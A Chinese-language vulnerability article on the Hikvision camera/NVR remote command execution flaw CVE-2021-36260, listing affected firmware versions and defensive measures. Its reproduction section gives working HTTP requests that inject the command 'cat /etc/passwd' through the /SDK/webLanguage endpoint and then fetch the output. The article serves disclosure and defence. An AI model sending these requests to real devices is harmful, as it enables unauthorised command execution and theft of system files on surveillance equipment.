随着技术的飞速发展,视频监控设备在家庭、企业、公共场所等领域得到了广泛应用。海康威视作为中国乃至全球领先的安防设备供应商,其产品凭借高质量和可靠性广受市场青睐。然而,近期海康威视IP摄像机/NVR设备固件被曝出存在安全漏洞(CVE-2021-36260),引发了公众对监控设备安全的关注。
一、漏洞简介
海康威视IP摄像机/NVR设备固件中发现一个未认证的远程代码执行漏洞(CVE-2021-36260)。该漏洞的影响范围较广,涉及IP摄像头和NVR设备固件,主要是由于对输入参数检验不充分导致的。未经身份验证的攻击者通过构造恶意命令请求包发送到受影响设备,即可实现远程命令执行。
二、受影响版本
以下为受影响的版本列表:
- IPCE0:IPCE0CNSTD5.4.6180112
- IPCE1:未知
- IPCE2:IPCE2ENSTD5.5.52180620
- IPCE4:未知
- IPCE6:IPCKE6ENSTD5.5.100200226
- IPCE7:IPCKE7ENSTD5.5.120200604
- IPCG3:IPCG3ENSTD5.5.160210416
- IPCG5:IPCG5ENSTD5.5.113210317
- IPCH1:IPCH1ENSTD5.4.61181204
- IPCH5:IPCPH5ENSTD5.5.85201120
- IPCH8:Factory installed firmware mid 2021
- IPCR2:IPCR2ENSTDV5.4.81180203
三、漏洞复现
以下是漏洞复现的简要步骤:
- 将要执行的命令写入文件中。
PUT /SDK/webLanguage HTTP/1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Host: XXXX
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q0.9,sv;q0.8
Content-Length: 91
<?xml version="1.0" encoding="UTF-8"?>
<language>(cat /etc/passwd>webLib/passwd)</language>
- 读取命令执行结果。
GET /passwd HTTP/1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: /
四、防范措施
为防止攻击者利用此漏洞攻击你的监控设备,请采取以下措施:
更新固件:海康威视已发布了修复此漏洞的固件版本,请尽快升级受影响设备的固件。
增强安全防护:确保监控设备与互联网的连接仅限于必要的服务和端口,以降低攻击风险。
定期检查:定期检查设备运行状态和系统日志,以便及时发现异常情况。
使用强密码:为监控设备设置复杂的密码,并定期更换密码。
五、总结
安全漏洞的发现和修复是技术进步的一部分。面对此次海康威视安全漏洞事件,我们应该关注网络安全问题,提高自身防护意识,及时关注并更新设备固件,以确保监控设备的安全稳定运行。同时,我们也期待更多企业能够加强产品安全设计,共同构建一个更加安全的网络环境。